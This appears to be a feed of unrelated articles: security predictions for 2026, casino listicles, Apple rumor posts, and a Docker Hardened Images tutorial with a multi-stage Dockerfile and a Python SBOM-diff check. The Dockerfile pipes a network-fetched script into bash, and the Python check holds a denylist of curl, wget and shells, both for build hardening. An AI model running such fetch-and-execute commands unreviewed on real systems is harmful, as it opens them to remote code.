Garvin expects security strategies to evolve inside SOCs as AI becomes more embedded. “The biggest shift will be the deeper integration of AI into defensive security operations. Organizations will increasingly invest in securing AI models and data pipelines, and they will evolve penetration testing and adversarial testing approaches to evaluate AI systems with the same rigor applied to traditional applications.”
Nadia Veeran-Patel, CISO at LRMG, has already seen this reshape incident workflows firsthand. “Our analysts were looking at incidents individually as they came through as alerts, but when AI brought them together as a collection, you suddenly realize those alerts are actually a series of events that led to something bigger.”
DeFiore also expects a fundamental shift in how security teams operate day to day. In 2026, she wants teams spending less time reacting to alerts and more time on anticipation and enablement, by using automation, better data, and tighter integration with IT and business partners to reduce friction and accelerate decision-making.
She adds what’s equally important is continued investment in people and culture. “Technology evolves quickly, but resilient organizations are built by teams that are well-trained, empowered, and aligned to a shared mission,” she says. “Creating clarity around risk ownership and decision-making is just as critical as any tool we deploy. Ultimately, success looks like a security program that enables innovation, withstands disruption, and earns trust at every level of the organization, from the boardroom to the front line.”
Toal expects AI-driven orchestration to become a defining feature of modern SOCs in 2026, as AI increasingly isolates compromised endpoints, blocks malicious IPs, rolls back ransomware in real time, and maps an attacker’s path. “The mean time to response would be vastly reduced. Instead of taking hours to respond to an incident, you could start to respond hopefully within seconds … [and] engage properly.”
SMEs will become prime targets amid rising automation
Winzer adds that 2026 will mark a decisive shift, with SMEs becoming primary targets for ransomware. According to the 2025 Verizon data breach report, ransomware made up 44% of all breaches globally, and SMEs represented a disproportionate percentage of victims.
“Why? Because they’re easy now … the rationale is they have limited security maturity and they cannot absorb outages, so they end up paying [the ransomware], even though the government is saying, ‘Don’t pay’. But it’s really difficult for them to negotiate because they don’t have the budget to put proper recovery plans in place.”
Winzer warns that AI-driven reconnaissance is accelerating this trend. “AI today is very capable. You can press a button and very quickly do a huge amount of damage within a few seconds.” Combined with gaps in mid-market MSSP coverage, which is “not necessarily as complete”, she says that makes it very easy for attackers to go after SMEs.
Veeran-Patel has seen a similar escalation in criminal tactics. “We have seen attackers routinely employing what we call triple extortion, where they combine not only data encryption, data leaking/extortion, and also leveraging third parties, like customers, regulators, and vendors, to put pressure on their victims to pay the ransoms.”
Even so, Winzer is cautiously optimistic that vendors will begin delivering more tailored solutions to the mid-market. “They did not do before. Now they’re realizing this is a huge target, and it’s also an opportunity to provide services.”
Supply chains remain vulnerable as nation-state activity intensifies
Winzer sees critical infrastructure as a primary cyber battlefield. Operational environments are “far more reachable,” she says, due to IT/OT convergence, cloud-connected control systems, and remote-access pathways that remain exposed even when partial segmentation exists.
Payten warns that data risk is increasingly hidden within complex supply chains, as organizations rely on expanding ecosystems of third-party and SaaS providers. That reliance, she says, quietly compounds exposure. “We’re using so many third parties, and those third parties use their own third parties; they become fourth parties,” she says.
The challenge is not just assessing vendors at the point of engagement but maintaining visibility over where sensitive data ultimately resides. “You can’t outsource your accountability,” Payten says. “You still own the data.”
Healthcare and local councils remain high-risk targets as well, driven by low cyber budgets, sensitive population data and the high cost of downtime, Winzer adds. “Before [attackers] were going after the cash only. But now they’re looking at reputational damage, because that causes organizations to pay faster.”
Veeran-Patel expects nation-state pressure to intensify too, warning that geopolitical conflict is increasingly being played out in cyberspace. “Cyber warfare is a real thing,” she says. “Wars are no longer going to be fought on the front lines with soldiers on the ground. They are likely going to be fought with buttons.” Her concern is that many governments are still not treating the risk with the level of urgency it requires, despite signs of critical infrastructure in developing nations already being taken offline by hostile actors.
Vendors must deliver secure-by-design products
Al-Sharif believes 2026 will be the year when the industry confronts a long-ignored truth that non-malicious insiders are not the main problem. “My issue is with the technology makers,” she says. “They still give me a car with no brake, no lock, no seatbelts. They sell it to me and find a way for me to sign away my rights … my issue is that technology makers need to be held accountable for creating flawed technology.”
She predicts insecure defaults will become untenable as incidents continue to trace back to weak authentication and outdated access controls. She says the problem is especially visible in healthcare, where connected devices still arrive with default passwords and cannot be patched without voiding warranties. “I want the government to make sure there’s a way to measure how secure those devices are before I connect a life support machine to them.”
Payten echoes concerns about insecure defaults and poorly secured connected devices. From routers to smart appliances, she notes that default credentials and weak configurations remain widespread. “There are still people with default passwords on their routers … and now there are so many connected devices.”
Now is the time to prepare for post-quantum cryptography
Zoe Hearn, head of cybersecurity strategy and governance at Insignia Financial, says rising expectations from customers, regulators, and governments are pushing organizations to take a more proactive role in preparing for the post-quantum era. She points out that simply complying with emerging standards will not be enough.
“With quantum-vulnerable encryption set to be phased out by 2030, now is the time to invest in future-ready security infrastructure,” she says. For Hearn, the shift demands leadership, not just technical uplift, as quantum risk increasingly becomes a board-level conversation.
Timothy Youngblood, CISO in residence at Astrix Security and former CISO at McDonald’s and T-Mobile, shares the same concern. He expects progressive enterprises to begin mapping their quantum security in preparation for the mainstream arrival of the technology. “The more progressive enterprises are going to start to assess their quantum security gaps, who are the partners that they need to address that,” he says. “It has the potential to be another Y2K. It’s a slow-moving Y2K. Of course, people are going to be caught off guard whenever quantum becomes mainstream, and that’s coming. It’s time to assess what the strategies are.”
Toal believes boards will soon pay closer attention to quantum risk as well. He notes that attackers are already harvesting encrypted data today in anticipation of future decryption. “It might still be slightly behind AI recognition, but I think boards are going to realize they have a longer-term problem,” he says.
Auditors, he predicts, will begin raising quantum preparedness in security reviews, forcing it onto roadmaps. “If they’re not addressing the fact that a minor breach today could become a major problem in the near future, that’s a gap boards will need to reckon with.”
View the full article
World’s Best Casinos Around the Globe
1. The Venetian Macao, China
The Venetian Macao is not just a casino; it is a complete resort that offers luxury accommodations, high-end dining, and an extensive gaming floor. It replicates the charm of Venice with its canals and gondola rides.
Size: Over 550,000 square feet of gaming space
Games: Poker, slots, table games
Unique Feature: Indoor gondola rides
2. Bellagio, Las Vegas, USA
The Bellagio in Las Vegas is renowned for its elegance and sophistication, with the iconic fountain show that draws millions of visitors each year. Inside, the casino features a vast selection of games and high-stakes poker rooms.
Size: 116,000 square feet of casino floor
Games: Slots, blackjack, baccarat
Unique Feature: Famous fountain show
3. Casino de Monte-Carlo, Monaco
Casino de Monte-Carlo has a rich history and is synonymous with luxury and glamour. It is a playground for the wealthy and offers a glimpse into the high-stakes gambling world.
Size: 100,000 square feet
Games: Roulette, poker, slot machines
Unique Feature: Stunning architecture and decor
4. Marina Bay Sands, Singapore
Marina Bay Sands is an architectural marvel that combines entertainment, shopping, and gaming under one roof. Its casino offers a vast array of games along with a spectacular view of the Singapore skyline.
Size: 160,000 square feet
Games: Baccarat, blackjack, poker
Unique Feature: SkyPark with infinity pool
5. Atlantis Resort Casino, Bahamas
The Atlantis Resort Casino features a unique underwater theme, making it one of the most visually stunning casinos in the world. Guests can enjoy both gaming and various water activities.
Size: 78,000 square feet of gaming
Games: Table games, poker, electronic gaming
Unique Feature: Aquaventure water park
World’s Best Casinos Around the Globe
When it comes to gambling and entertainment, there are a few destinations that stand out for their grandeur, atmosphere, and overall experience. Below are some of the world’s best casinos that attract millions of visitors each year. CasinoBullseye’s Casinos directory is your go-to global guide for the world’s top gambling destinations, offering a curated ranking of the most exciting casinos across countries and cities. Whether you’re planning your next gaming getaway or simply exploring renowned casino hotspots, the page provides intuitive filters, key highlights, and essential details to help you compare venues and find the best experiences worldwide. From iconic brick-and-mortar resorts to acclaimed gaming floors, CasinoBullseye makes it easy to browse and discover premier casinos — all backed by rankings designed to help players and travelers make informed choices.


1. The Bellagio, Las Vegas
Known for its elegant atmosphere and stunning fountain show, The Bellagio is a staple of the Las Vegas Strip. Features include:
Lush gardens and art galleries
A diverse range of gaming options
Exceptional dining experiences
2. Marina Bay Sands, Singapore
With its iconic rooftop infinity pool, Marina Bay Sands is not only a casino but a landmark. Highlights include:
A massive gaming floor with over 2,500 slot machines
Luxurious hotel accommodations
World-class shopping and dining
3. Casino de Monte-Carlo, Monaco
A symbol of luxury and elegance, Casino de Monte-Carlo boasts a rich history and stunning architecture. Visitors can enjoy:
Classic table games in a breathtaking environment
An impressive collection of fine art
Exclusive events and performances
4. The Venetian, Las Vegas
The Venetian provides an immersive experience with its charming canals and gondola rides. Key features include:
A vast gaming space with a variety of options
Unique shopping and dining experiences
Authentic Venetian architecture and decor
5. Casino Lisboa, Macau
One of the largest casinos in the world, Casino Lisboa offers an extensive selection of gaming and entertainment. Guests can expect:
Over 1,000 slot machines
A lively atmosphere with live performances
Fine dining establishments with global cuisine
Conclusion
Whether you’re a casual gambler or a high roller, these casinos offer unique experiences and exceptional amenities that cater to all types of visitors. Plan your next trip to one of these fabulous locations and indulge in the thrill of the game.
World’s Best Casinos Around the Globe
When it comes to gambling and entertainment, some casinos stand out as the best in the world. These establishments not only offer a wide range of gaming options but also provide luxurious accommodations, world-class dining, and unforgettable experiences. Here are some of the top casinos that every gaming enthusiast should consider visiting.
1. The Venetian, Las Vegas
The Venetian is a lavish hotel and casino located on the Las Vegas Strip, known for its stunning architecture and romantic gondola rides.
Game Selection: A vast array of table games and thousands of slot machines.
Dining Options: Over 40 different restaurants featuring various cuisines.
Entertainment: Spectacular shows and events almost every night.
2. Marina Bay Sands, Singapore
Marina Bay Sands offers breathtaking views of the city skyline and is famous for its infinity pool and luxurious casino experience.
Casino Size: One of the largest in Asia, with a vast gaming floor.
Architecture: Iconic design with three interconnected towers.
Attractions: SkyPark, shopping mall, and museums nearby.
3. Casino de Monte-Carlo, Monaco
This historic casino has been a symbol of luxury and elegance for over 150 years, attracting high rollers from around the world.
Gaming Experience: A mix of classic and modern casino games.
Architecture: A stunning example of Belle Époque architecture.
High-Stakes Games: Exclusive areas for VIP gamblers.
4. Wynn Macau, Macau
Wynn Macau is known for its opulent design and exceptional service, providing a premium gaming experience.
Game Variety: Numerous gaming tables and machines, including poker and baccarat.
Luxury Amenities: High-end accommodations and award-winning restaurants.
Entertainment: Live performances and stunning shows.
5. Bellagio, Las Vegas
Famous for its elegant ambiance and the iconic fountain show, Bellagio offers a sophisticated gambling experience.
Casino Layout: Designed to provide a comfortable and engaging gaming environment.
Dining: Over 10 fine dining restaurants featuring renowned chefs.
Art Exhibits: Features a stunning conservatory and botanical garden.
These casinos offer more than just gaming; they provide luxurious experiences that appeal to all senses. A visit to any of these establishments guarantees not only a chance to try your luck but also to enjoy world-class amenities and entertainment.
View the full article
2026 promises to be yet another busy year for Apple, with the company rumored to be planning more than 20 product announcements over the coming months.


Beyond the usual updates to iPhones, iPads, Macs, and Apple Watches, Apple is expected to release its all-new smart home hub, which was reportedly delayed until the more personalized version of Siri is ready. Other unique products rumored for this year include a foldable iPhone, a lower-cost MacBook with an A18 Pro chip, and more.

Here is what to expect from Apple this year, according to rumors.

First Half of 2026

The following products are rumored to launch before the end of June.

iPhone 17e: A spec-bumped successor to the iPhone 16e, with rumored upgrades including an A19 chip, MagSafe, and a Dynamic Island.
iPad Air: M3 chip → M4 chip.
iPad: A16 chip → A18 chip or A19 chip.
MacBook Pro: M4 Pro and M4 Max chips → M5 Pro and M5 Max chips, and PCIe 5.0 support for faster SSD speeds.
MacBook Air: M4 chip → M5 chip.
Lower-Cost MacBook: A18 Pro chip, 12.9-inch display, and fun color options.
Mac Studio: M4 Max and M3 Ultra chips → M5 Max and M5 Ultra chips.
Studio Display: Mini-LED backlighting, ProMotion support for up to a 120Hz refresh rate, HDR support, and either an A19 chip or A19 Pro chip.
Home Hub: An all-new smart home hub featuring the more personalized version of Siri, a 6-inch to 7-inch square display, an A18 chip for Apple Intelligence, FaceTime, and more. Place it on a table or mount it on a wall.
Security Camera: Apple-designed, HomeKit-enabled security camera accessory to be sold alongside the new smart home hub.

Second Half of 2026

The following products are rumored to launch between September and December.

iPhone 18 Pro: A20 Pro chip, a narrower Dynamic Island, a simplified Camera Control, variable aperture for at least one rear camera, web browsing via satellite, Apple-designed C2 modem for 5G, and more.
iPhone 18 Pro Max: The same features rumored for the iPhone 18 Pro, but the Pro Max model might be slightly thicker.
Foldable iPhone: 7.7-inch inner display with a virtually "crease-free" design, 5.3-inch outer display, two rear cameras, one front camera, a Touch ID power button instead of Face ID, and more.
Apple Watch Series 12: A new chip, design changes, and potentially Touch ID.
Apple Watch Ultra 4: The same changes listed above for the Apple Watch Series 12.
MacBook Pro: A major redesign later in 2026, with M6 Pro and M6 Max chips, an OLED display, a touch screen, a Dynamic Island, a thinner design, and an Apple-designed C2 modem for built-in cellular connectivity.
Higher-End AirPods Pro 3: Infrared camera for AI features.

Timing Less Clear

The following products were rumored to be updated in 2025, but none of them were, so hopefully they will finally arrive at some point in 2026:

Apple TV: A17 Pro chip with support for the more personalized Siri, and Apple's N1 chip with Wi-Fi 7 support. A built-in FaceTime camera has been rumored for a future Apple TV, but it is unclear if that will arrive with the next model.
HomePod mini: S9 chip or newer with support for the more personalized Siri, Apple's N1 chip with Wi-Fi 7 support, improved sound quality, a second-generation Ultra Wideband chip, and potentially new color options like red.
AirTag: Up to 3× longer item tracking range compared to the previous generation, a more tamper-proof speaker, and more.

These products are rumored to be unveiled in 2026 at the earliest:

Apple Glasses: Augmented reality glasses with speakers for music playback, cameras for photos and video, voice control, and potentially health features.
Face ID Doorbell: A video doorbell with Face ID and HomeKit Secure Video, wirelessly connects to a compatible deadbolt lock.
iPad mini: A17 Pro chip → A19 Pro or A20 Pro chip, an OLED display, a vibration-based speaker system, and a water-resistant design.

For more details, read our Upcoming Apple Products Guide: What's Coming in 2026.
This article, "Apple to Launch These 20+ Products This Year" first appeared on MacRumors.com

Discuss this article in our forums

Apple plans to release new MacBook Pro, MacBook Air, Mac Studio, and Studio Display models in the first half of this year, according to Bloomberg's Mark Gurman.


In his Power On newsletter today, Gurman added that redesigned MacBook Pro models with an OLED touch screen "should be hitting toward the end of 2026," meaning that the MacBook Pro line would be upgraded twice this year.

First up will be MacBook Pro models with M5 Pro and M5 Max chips, which should be coming soon. Then, the MacBook Pro is expected to receive a major redesign in late 2026 (but 2027 is still not fully ruled out), with rumored features including an OLED touch screen, a Dynamic Island, M6 Pro and M6 Max chips, a thinner design, and built-in cellular connectivity.

Apple updated the MacBook Pro twice in one year in the past, with the M2 Pro and M2 Max models debuting in January 2023 and the M3 Pro and M3 Max models following in October 2023, so there is precedent for such a thing.

Apple's Creator Studio bundle of apps launches on Wednesday, January 28, and it has been speculated that Apple might use the opportunity to unveil the MacBook Pro models with M5 Pro and M5 Max chips this week.

As for the MacBook Air, it is expected to get the M5 chip, while the Mac Studio should get higher-end M5 Max and M5 Ultra chips.

There have been reports about a new Studio Display being in the works, with rumored features including mini-LED backlighting, ProMotion support for up to a 120Hz refresh rate, HDR support, and either an A19 or A19 Pro chip. Last month, the next-generation Studio Display was potentially spotted in a Chinese regulatory database.

Apple also plans to release a lower-cost MacBook with an iPhone chip and an updated Mac mini at some point this year, according to Gurman. The lower-cost MacBook is expected to be powered by a version of the iPhone 16 Pro's A18 Pro chip.

This article, "Apple Reportedly Aiming to Upgrade the MacBook Pro Twice This Year" first appeared on MacRumors.com

Customizing Docker Hardened Images
In Part 1 and Part 2, we established the baseline. You migrated a service to a Docker Hardened Image (DHI), witnessed the vulnerability count drop to zero, and verified the cryptographic signatures and SLSA provenance that make DHI a compliant foundation.
But no matter how secure a base image is, it is useless if you can’t run your application on it. This brings us to the most common question engineers ask during a DHI trial: what if I need a custom image?
Hardened images are minimal by design. They lack package managers (apt, apk, yum), utilities (wget, curl), and even shells like bash or sh. This is a security feature: if a bad actor breaks into your container, they find an empty toolbox.
However, developers often need these tools during setup. You might need to install a monitoring agent, a custom CA certificate, or a specific library.
In this final part of our series, we will cover the two strategies for customizing DHI: the Docker Hub UI (for platform teams creating “Golden Images”) and the multi-stage build pattern (for developers building applications).
Option 1: The Golden Image (Docker Hub UI)
If you are a Platform or DevOps Engineer, your goal is likely to provide a “blessed” base image for your internal teams. For example, you might want a standard Node.js image that always includes your corporate root CA certificate and your security logging agent. The Docker Hub UI is the preferred path for this. The strongest argument for using the Hub UI is maintenance automation.
The Killer Feature: Automatic Rebuilds
When you customize an image via the UI, Docker understands the relationship between your custom layers and the hardened base. If Docker releases a patch for the underlying DHI base image (e.g., a fix in glibc or openssl), Docker Hub automatically rebuilds your custom image.
You don’t need to trigger a CI pipeline. You don’t need to monitor CVE feeds. The platform handles the patching and rebuilding, ensuring your “Golden Image” is always compliant with the latest security standards.
How It Works
Since you have an Organization set up for this trial, you can explore this directly in Docker Hub. First, navigate to Repositories in your organization dashboard. Locate the image you want to customize (e.g., dhi-node), open the Customizations tab and click the “Create customization” action. This initiates a customization workflow as follows:
In the “Add packages” section, you can search for and select OS packages directly from the distribution’s repository. For example, here we are adding bash to the image for debugging purposes. You can also add “OCI Artifacts” to inject custom files like certificates or agents.
Finally, configure the runtime settings (User, Environment Variables) and review your build. Docker Hub will verify the configuration and queue the build. Once complete, this image will be available in your organization’s private registry and will automatically rebuild whenever the base DHI image is updated.
This option is best suited for creating standardized “golden” base images that are used across the entire organization. The primary advantage is zero-maintenance security patching due to automatic rebuilds by Docker Hub. However, it is less flexible for rapid, application-specific iteration by individual development teams.
Option 2: Multi-Stage Build
If you are a developer, you likely define your environment in a Dockerfile that lives alongside your code. You need flexibility, and you need it to work locally on your machine.
Since DHI images don’t have apt-get or curl, you cannot simply RUN apt-get install my-lib in your Dockerfile. It will fail.
Instead, we use the multi-stage build pattern. The concept is simple:
Stage 1 (Builder): Use a standard “fat” image (like debian:bookworm-slim) to download, compile, and prepare your dependencies.
Stage 2 (Runtime): Copy only the resulting artifacts into the pristine DHI base.
This keeps your final image minimal, non-root, and secure, while still allowing you to install whatever you need.
Hands-on Tutorial: Adding a Monitoring Agent
Let’s try this locally. We will simulate a common real-world scenario: adding the Datadog APM library (dd-trace) globally to a Node.js DHI image.
1. Setup
Create a new directory for this test and add a simple server.js file. This script attempts to load the dd-trace library to verify our installation.
app/server.js
// Simple Node.js script to demonstrate DHI customization
console.log('Node.js version:', process.version);
try {
  require('dd-trace');
  console.log('dd-trace module loaded successfully!');
} catch (e) {
  console.error('Failed to load dd-trace:', e.message);
  process.exit(1);
}
console.log('Running as UID:', process.getuid(), 'GID:', process.getgid());
console.log('DHI customization test successful!');
2. Hardened Dockerfile
Now, create the Dockerfile. We will use a standard Debian image to install the library, and then copy it to our DHI Node.js image.
# Stage 1: Builder - a standard Debian Slim image that has apt, curl, and full shell access.
FROM debian:bookworm-slim AS builder

# Install Node.js (matching our target version) and tools
RUN apt-get update && \
    apt-get install -y curl && \
    curl -fsSL https://deb.nodesource.com/setup_24.x | bash - && \
    apt-get install -y nodejs

# Install Datadog APM agent globally (we force the install prefix to /usr/local so we know exactly where files go)
RUN npm config set prefix /usr/local && \
    npm install -g [email protected]

# Stage 2: Runtime - we switch to the Docker Hardened Image.
FROM <your-org-namespace>/dhi-node:24.11-debian13-fips

# Copy only the required library from the builder stage
COPY --from=builder /usr/local/lib/node_modules/dd-trace /usr/local/lib/node_modules/dd-trace

# Environment Configuration
# DHI images are strict. We must explicitly tell Node where to find global modules.
ENV NODE_PATH=/usr/local/lib/node_modules

# Copy application code
COPY app/ /app/
WORKDIR /app

# DHI Best Practice: Use the exec form (["node", ...])
# because there is no shell to process strings.
CMD ["node", "server.js"]
3. Build and Run
Build the custom image:
docker build -t dhi-monitoring-test .
Now run it. If successful, the container should start, find the library, and exit cleanly.
docker run --rm dhi-monitoring-test
Output:
Node.js version: v24.11.0
dd-trace module loaded successfully!
Running as UID: 1000 GID: 1000
DHI customization test successful!
Success! We have a working application with a custom global library, running on a hardened, non-root base.
Security Check
We successfully customized the image. But did we compromise its security?
This is the most critical lesson of operationalizing DHI: hardened base images protect the OS, but they do not protect you from the code you add. Let’s verify our new image with Docker Scout.
docker scout cves dhi-monitoring-test --only-severity critical,high
Sample Output:
✗ Detected 1 vulnerable package with 1 vulnerability
...
   0C     1H     0M     0L  lodash.pick 4.4.0
pkg:npm/lodash.pick@4.4.0

    ✗ HIGH CVE-2020-8203 [Improperly Controlled Modification of Object Prototype Attributes]
This result is accurate and important. The base image (OS, OpenSSL, Node.js runtime) is still secure. However, the dd-trace library we just installed pulled in a dependency (lodash.pick) that contains a High severity vulnerability.
This proves that your verification pipeline works.
If we hadn’t scanned the custom image, we might have assumed we were safe because we used a “Hardened Image.” By using Docker Scout on the final artifact, we caught a supply chain vulnerability introduced by our customization.
Let’s check how much “bloat” we added compared to the clean base.
docker scout compare --to <your-org-namespace>/dhi-node:24.11-debian13-fips dhi-monitoring-test
You will see that the only added size corresponds to the dd-trace library (~5MB) and our application code. We didn’t accidentally inherit apt, curl, or the build caches from the builder stage. The attack surface remains minimized.
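The same “what did my customization add?” question can be answered offline in CI by diffing two CycloneDX SBOMs, for example the ones retrievable with docker scout attestation get and the https://cyclonedx.org/bom/v1.6 predicate type for the base image and the customized image. This is an added Python example, not code from the Docker post; both SBOMs and every version string in them are constructed, and the denylist of builder-stage tools is an assumption based on the tools named above.

```python
"""Diff two CycloneDX SBOMs to see exactly what a DHI customization added.

Added example, not part of the Docker post. Both SBOMs below are
constructed, abbreviated stand-ins for the CycloneDX documents of the
pristine dhi-node base and the dhi-monitoring-test image built on it.
"""
import json

# Tools that live in the builder stage but must never reach the runtime
# stage of a multi-stage build (assumption: extend to your own policy).
BUILDER_TOOL_DENYLIST = {"apt", "apt-get", "curl", "wget", "bash", "sh"}

# Constructed sample: components of the hardened base image (versions invented).
BASE_SBOM = json.dumps({
    "bomFormat": "CycloneDX",
    "specVersion": "1.6",
    "components": [
        {"type": "library", "name": "glibc", "version": "0.0.1-constructed",
         "purl": "pkg:deb/debian/glibc@0.0.1-constructed"},
        {"type": "library", "name": "openssl", "version": "0.0.1-constructed",
         "purl": "pkg:deb/debian/openssl@0.0.1-constructed"},
        {"type": "application", "name": "node", "version": "24.11.0",
         "purl": "pkg:generic/node@24.11.0"},
    ],
})


def _with_extra(base_json: str, extra: list[dict]) -> str:
    """Return a copy of a CycloneDX SBOM with extra components appended."""
    doc = json.loads(base_json)
    doc["components"] = doc["components"] + extra
    return json.dumps(doc)


# Constructed sample: the customized image after copying dd-trace in.
# dd-trace's version is a placeholder; lodash.pick 4.4.0 is the dependency
# that Docker Scout flagged in the post.
CUSTOM_SBOM = _with_extra(BASE_SBOM, [
    {"type": "library", "name": "dd-trace", "version": "0.0.0-placeholder",
     "purl": "pkg:npm/dd-trace@0.0.0-placeholder"},
    {"type": "library", "name": "lodash.pick", "version": "4.4.0",
     "purl": "pkg:npm/lodash.pick@4.4.0"},
])

# Constructed failure case: a Dockerfile that also copied curl from the builder.
LEAKY_SBOM = _with_extra(CUSTOM_SBOM, [
    {"type": "application", "name": "curl", "version": "0.0.1-constructed",
     "purl": "pkg:deb/debian/curl@0.0.1-constructed"},
])


def component_index(sbom_json: str) -> dict[str, dict]:
    """Map each component to a stable key: its purl, or name@version if no purl."""
    index = {}
    for comp in json.loads(sbom_json).get("components", []):
        key = comp.get("purl") or f"{comp.get('name')}@{comp.get('version', '')}"
        index[key] = comp
    return index


def added_components(base_json: str, custom_json: str) -> list[str]:
    """Keys present in the custom image but absent from the base image."""
    base = component_index(base_json)
    custom = component_index(custom_json)
    return sorted(k for k in custom if k not in base)


def builder_leaks(custom_json: str, added: list[str]) -> list[str]:
    """Added components whose name is a builder-stage tool that should not ship."""
    custom = component_index(custom_json)
    return [k for k in added if custom[k].get("name") in BUILDER_TOOL_DENYLIST]


def check_customization(base_json: str, custom_json: str) -> dict:
    """Summarise the diff; 'ok' is False if any builder tool leaked into runtime."""
    added = added_components(base_json, custom_json)
    leaks = builder_leaks(custom_json, added)
    return {"added": added, "leaks": leaks, "ok": not leaks}


if __name__ == "__main__":
    for label, sbom in (("custom", CUSTOM_SBOM), ("leaky", LEAKY_SBOM)):
        result = check_customization(BASE_SBOM, sbom)
        print(f"{label}: ok={result['ok']} added={result['added']} leaks={result['leaks']}")
```

The list in `added` is what still needs to go through docker scout cves, since every purl in it is code the hardened base did not vouch for.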
A Note on Provenance: Who Signs What?
In Part 2, we verified the SLSA Provenance and cryptographic signatures of Docker Hardened Images. This is crucial for establishing a trusted supply chain. When you customize an image, the question of who “owns” the signature becomes important.
Docker Hub UI Customization: When you customize an image through the Docker Hub UI, Docker itself acts as the builder for your custom image. This means the resulting customized image inherits signed provenance and attestations directly from Docker’s build infrastructure. If the base DHI receives a security patch, Docker automatically rebuilds and re-signs your custom image, ensuring continuous trust. This is a significant advantage for platform teams creating “golden images.”
Local Dockerfile: When you build a custom image using a multi-stage Dockerfile locally (as we did in our tutorial), you are the builder. Your docker build command produces a new image with a new digest. Consequently, the original DHI signature from Docker does not apply to your final custom image (because the bits have changed and you are the new builder).
However, the chain of trust is not entirely broken:
Base Layers: The underlying DHI layers within your custom image still retain their original Docker attestations.
Custom Layer: Your organization is now the “builder” of the new layers.
For production deployments using the multi-stage build, you should integrate Cosign or Docker Content Trust into your CI/CD pipeline to sign your custom images. This closes the loop, allowing you to enforce policies like: “Only run images built by MyOrg, which are based on verified DHI images and have our internal signature.”
Measuring Your ROI: Questions for Your Team
As you conclude your Docker Hardened Images trial, it’s critical to quantify the value for your organization. Reflect on the concrete results from your migration and customization efforts using these questions:
Vulnerability Reduction: How significantly did DHI impact your CVE counts? Compare the “before and after” vulnerability reports for your migrated services. What is the estimated security risk reduction?
Engineering Effort: What was the actual engineering effort required to migrate an image to DHI? Consider the time saved on patching, vulnerability triage, and security reviews compared to managing traditional base images.
Workflow: How well does DHI integrate into your team’s existing development and CI/CD workflows? Do developers find the customization patterns (Golden Image / Builder Pattern) practical and efficient? Is your team likely to adopt this long-term?
Compliance & Audit: Has DHI simplified your compliance reporting or audit processes due to its SLSA provenance and FIPS compliance? What is the impact on your regulatory burden?
Conclusion
Thanks for following through to the end! Over this 3-part blog series, you have moved from a simple trial to a fully operational workflow:
Migration: You replaced a standard base image with DHI and saw immediate vulnerability reduction.
Verification: You independently validated signatures, FIPS compliance, and SBOMs.
Customization: You learned to extend DHI using the Hub UI (for auto-patching) or multi-stage builds, while checking for new vulnerabilities introduced by your own dependencies.
The lesson here is that the “Hardened” in Docker Hardened Images isn’t a magic shield but a clean foundation. By building on top of it, you ensure that your team spends time securing your application code, rather than fighting a never-ending battle against thousands of upstream vulnerabilities.
There has been increasing discussion about Tim Cook eventually stepping down as Apple's CEO, but reports have offered differing timelines.


A few months ago, the Financial Times reported that Apple was preparing for Cook to step down as soon as early 2026. In his Power On newsletter today, however, Bloomberg's Mark Gurman said that timeframe "seems unlikely."

Gurman previously said he would be "shocked" if Cook stepped down before the middle of 2026, so he might remain CEO through WWDC in June at a minimum.

There has been speculation that Cook might become the chairman of Apple's board of directors after he steps down as CEO, but it seems like that transition will not happen imminently, as Apple's current chairman Arthur D. Levinson is up for re-election at the company's annual shareholders meeting on February 24.

Apple has a guideline stating that directors generally may not stand for re-election after age 75, but the company asked shareholders to make an exemption for Levinson, due to his significant experience and expertise among other factors.

Apple's Senior Vice President of Hardware Engineering, John Ternus, is widely viewed as Cook's most likely successor. Earlier this week, Gurman reported that Cook gave oversight of Apple's design teams to Ternus at the end of last year, and he said this move makes it "crystal clear" that Ternus is the leading CEO candidate.

Cook has been Apple's CEO since August 2011, and he reached the typical retirement age of 65 last year. It is sounding more and more likely that his time in charge of the company is inching towards the end, but Gurman seems confident that a passing of the baton is still many months away at least, rather than something that is imminent.

This article, "When Will Tim Cook Step Down as Apple CEO? Here's What Reports Say" first appeared on MacRumors.com

Amazon this weekend is offering discounts across the M5 iPad Pro lineup, including both 11-inch and 13-inch models. The highlight this time around is a return of a low price on the 256GB Wi-Fi 11-inch M5 iPad Pro, which is on sale for $899.00, down from $999.00.

Note: MacRumors is an affiliate partner with some of these vendors. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running.

Many of the deals in this sale match — or beat — the record low prices we tracked during the holiday season. Amazon provides an estimated delivery date around January 30 for free delivery, but Prime members should see earlier delivery dates in many cases.

$100 off: 11-inch M5 iPad Pro (256GB Wi-Fi) for $899.00
$149 off: 13-inch M5 iPad Pro (256GB Wi-Fi) for $1,149.99

There are fewer 13-inch M5 iPad Pro models on sale this time around, but the ones that are on sale have steeper discounts compared to last week. You'll find $149 off two Wi-Fi models (both all-time low prices), plus a new record low price on the 1TB Wi-Fi 13-inch M5 iPad Pro at $202 off the original price.

11-Inch M5 iPad Pro

256GB Wi-Fi - $899.00 ($100 off)
512GB Wi-Fi - $1,099.00 ($100 off)
1TB Wi-Fi - $1,499.99 ($99 off)
1TB Nano-Texture Glass Wi-Fi - $1,576.00 ($123 off)
2TB Wi-Fi - $1,851.00 ($148 off)
2TB Nano-Texture Glass Wi-Fi - $1,999.00 ($100 off)
13-Inch M5 iPad Pro

256GB Wi-Fi - $1,149.99 ($149 off)
512GB Wi-Fi - $1,349.99 ($149 off)
1TB Wi-Fi - $1,696.91 ($202 off)

If you're on the hunt for more discounts, be sure to visit our Apple Deals roundup where we recap the best Apple-related bargains of the past week.







This article, "Apple's M5 iPad Pro Hits Multiple Record Low Prices on Amazon" first appeared on MacRumors.com

Apple plans to unveil a more personalized version of Siri powered by Google Gemini next month, according to Bloomberg's Mark Gurman.


"The company has been planning an announcement of the new Siri in the second half of February, when it will give demonstrations of the functionality," he wrote, in the latest edition of his weekly Power On newsletter today.

Gurman does not yet know if Apple plans to hold a full-out event to demonstrate the Siri upgrades, or if it will hold private briefings with the media.

The more personalized Siri will be part of iOS 26.4, which will be available in beta in February and released to the general public in March or early April, according to Gurman. Based on that timeframe, the new-and-improved Siri should be available to all customers with an iPhone 15 Pro or newer in just a few more months.

As previewed by Apple, the assistant "should be able to tap into personal data and on-screen content to fulfill tasks," according to Gurman.

Apple first announced the more personalized version of Siri all the way back at WWDC 2024, but it was eventually delayed. At the time, Apple showed an iPhone user asking Siri about their mother's flight and lunch reservation plans based on info retrieved from the Mail and Messages apps, as one example of a new capability.

